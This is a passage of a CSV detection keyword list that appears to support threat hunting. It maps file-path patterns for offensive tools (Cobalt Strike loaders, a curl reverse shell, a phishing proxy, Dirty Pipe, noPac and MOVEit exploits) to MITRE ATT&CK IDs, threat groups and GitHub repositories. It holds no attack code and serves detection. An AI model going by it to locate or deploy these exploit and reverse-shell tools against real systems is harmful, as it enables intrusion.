TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z 
-*/CS-Loader/*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/csOnvps/*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/csOnvps/*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/cs-rdll-ipc-example/*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*/CS-Remote-OPs-BOF*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/cs-token-vault/*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*/cube0x0/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/cube0x0/noPac,1,1,N/A,N/A,10,1259,318,2021-12-16T09:50:15Z,2021-12-11T19:27:30Z -*/cuddlephish.git*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/cuddlephish.html*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/cups-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cups-queue-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/curl.cna,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curl.x64.o,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curl.x86.o,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curlshell.git*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*/custom_payload_generator/*,offensive_tool_keyword,cobaltstrike,Various Aggressor Scripts I've Created.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/offsecginger/AggressorScripts,1,1,N/A,10,10,141,31,2022-01-01T19:04:27Z,2018-11-30T03:14:45Z -*/customPayload/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*-*_POC.py*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/CVE-*.bin,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*.jar,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE*/chocobo_root*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/cve*/exploit.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/CVE-*_EXPLOIT_0DAY/*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23399,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/CVE-*x64.exe,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*x86.exe,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-2009-2698/katon.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/CVE-2022-*.git*,offensive_tool_keyword,POC,POC exploit pattern from github,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CVE-2022-*.go*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/CVE-2022-0847.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/4luc4rdr5290/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-08T20:41:15Z,2022-03-08T20:18:28Z -*/CVE-2022-0847/write_anything.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe 
vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/CVE-2022-0847-dirty-pipe-checker*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,1,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -*/CVE-2022-0847-DirtyPipe-Exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit,1,1,N/A,N/A,10,1057,223,2022-03-08T06:20:05Z,2022-03-07T18:55:20Z -*/CVE-2022-0847-dirty-pipe-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit,1,1,N/A,N/A,1,2,3,2022-03-08T11:15:00Z,2022-03-08T10:40:07Z -*/CVE-2022-0847-Docker*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/mrchucu1/CVE-2022-0847-Docker,1,1,N/A,N/A,1,0,1,2022-03-08T17:05:01Z,2022-03-08T17:02:40Z -*/cve-2022-23131-exp/blob/main/zabbix.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp,1,1,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*/CVE-2022-26809-RCE*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z 
-*/CVE-2023-*.git*,offensive_tool_keyword,POC,POC exploit pattern from github,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CVE-2023-34362.git*,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,1,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*/CVE-2023-38831-RaRCE*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*/cvs-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cvs-brute-repository.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CWoNaJLBo/VTNeWw11212/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 